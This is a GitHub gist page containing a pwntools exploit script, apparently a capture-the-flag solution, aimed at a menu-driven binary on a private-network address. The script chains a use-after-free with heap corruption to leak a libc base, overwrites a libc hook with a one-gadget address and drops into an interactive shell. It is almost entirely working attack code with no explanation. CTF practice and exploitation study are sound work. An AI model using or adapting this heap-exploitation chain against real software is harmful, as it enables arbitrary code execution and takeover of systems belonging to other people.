Skip to content

Instantly share code, notes, and snippets.

@ujin5
Created November 20, 2017 03:09
Show Gist options
  • Save ujin5/81574984dd1ff6ee81804164bcb710ea to your computer and use it in GitHub Desktop.
Save ujin5/81574984dd1ff6ee81804164bcb710ea to your computer and use it in GitHub Desktop.
kikikiki
from pwn import *
#s = remote('192.168.0.12',1234)
s =remote('10.10.134.127', 30004)
def add(name):
s.recvuntil('>>>')
s.sendline('1')
s.recvuntil('name')
s.send(name)
def select(index):
s.recvuntil('>>>')
s.sendline('2')
s.recvuntil('>>>')
s.sendline(str(index))
def delete():
s.recvuntil('>>>')
s.sendline('3')
s.recvuntil('action')
s.sendline('-1')
def show():
s.recvuntil('>>>')
s.sendline('3')
def add_unit(name):
s.recvuntil('>>>')
s.sendline('1')
s.recvuntil('name')
s.send(name)
def uaf():
s.recvuntil('>>>')
s.sendline('3')
s.recvuntil('action :')
s.sendline('21')
s.recvuntil('action :')
s.sendline('1')
s.recvuntil('action :')
s.sendline('1')
s.recvuntil('action :')
s.sendline('1')
# s.recvuntil('action :')
# s.sendline('0')
def out():
s.recvuntil('>>>')
s.sendline('5')
def delete_unit(index):
s.recvuntil('>>>')
s.sendline('2')
s.recvuntil('>>>')
s.sendline(str(index))
def poison_null(dat):
s.recvuntil('>>>')
s.sendline('3')
s.recvuntil('action :')
s.sendline('21')
s.recvuntil('action :')
s.sendline('0')
s.recvuntil('hero!')
s.send(dat)
raw_input()
s.recvuntil('>>>')
s.send("AAAA")
# show me the money
s.recvuntil('>>>')
s.sendline('4444')
s.recvuntil('>>>')
s.sendline('show me the money!')
add("AAAA")
add("AAAA")
select(0)
delete()
add('A')
show()
libc = u64(s.recvuntil('[ 1]')[-7-6:-7]+'\x00\x00') - 0x3c4b41
log.info("LIBC : 0x%x"%libc)
select(0)
add_unit('ABCD')
add_unit('ABCD')
add_unit('ABCD')
out()
raw_input()
add('BBBB')
select(0)
uaf()
out()
select(2)
delete()
add('BBBB')
select(0)
s.recvuntil('>>>')
s.sendline('3')
s.recvuntil('action :')
s.sendline('21')
s.recvuntil('action :')
s.sendline('16')
s.recvuntil('hero')
s.sendline('A'*0x10)
s.recvuntil('action :')
s.sendline('16')
s.recvuntil('hero')
s.sendline('A'*0x10)
s.recvuntil('action :')
s.sendline('16')
s.recvuntil('hero')
s.send("A"*0x10+p64(libc+0x3c67a8-0x50))
out()
select(2)
s.recvuntil('>>>')
s.sendline('3')
s.recvuntil('action :')
s.sendline('21')
s.recvuntil('action :')
s.sendline('16')
s.recvuntil('hero')
s.send(p64(libc+0x4526a))
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment